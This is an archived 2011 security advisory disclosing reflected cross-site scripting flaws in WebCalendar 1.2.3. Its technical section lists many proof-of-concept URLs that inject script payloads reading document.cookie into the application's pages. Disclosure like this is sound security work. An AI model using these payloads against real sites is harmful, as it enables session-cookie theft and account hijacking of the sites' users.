Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26616
HistoryJul 06, 2011 - 12:00 a.m.

Multiple Cross-Site Scripting vulnerabilities in WebCalendar

2011-07-0600:00:00
vulners.com
22

Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
Advisory ID: SSCHADV2011-008
Author: Stefan Schurtz
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Vendor Status: informed
CVE-ID: -

==========================
Vulnerability Description:

This is a Cross-Site Scripting vulnerability

==================
Technical Details:

http://[target]/webapps/webcalendar/about/"><body onload=alert(documentcookie)>
http://[target]/webapps/webcalendar/about/"><body onload=alert('XSS')>

http://[target]/webapps/webcalendar/colors.php?color="><iframe onload=alert(document.cookie)>

http://[target]/webapps/webcalendar/datesel.php?form="><iframe onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/datesel.php?form=3&fday="><iframe
onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe
onload=alert(document.cookie)>&fyear=3&date=20110601
http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe
onload=alert(document.cookie)>&date=20110601

http://[target]/webapps/webcalendar/year.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/select_user.php/"><body onload=alert(document.cookie)>

http://[target]/webapps/webcalendar/week.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/month.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/search_handler.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/day.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/datesel.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/edit_entry.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/search.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_edit_entry.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/catsel.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_index.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_docs.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_bug.php/"><body onload=alert(document.cookie)>

=========
Solution:

====================
Disclosure Timeline:

02-Jul-2011 - informed developers
02-Jul-2011 - Release date of this security advisory

========
Credits:

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:

http://www.k5n.us/webcalendar.php
http://www.rul3z.de/advisories/SSCHADV2011-008.txt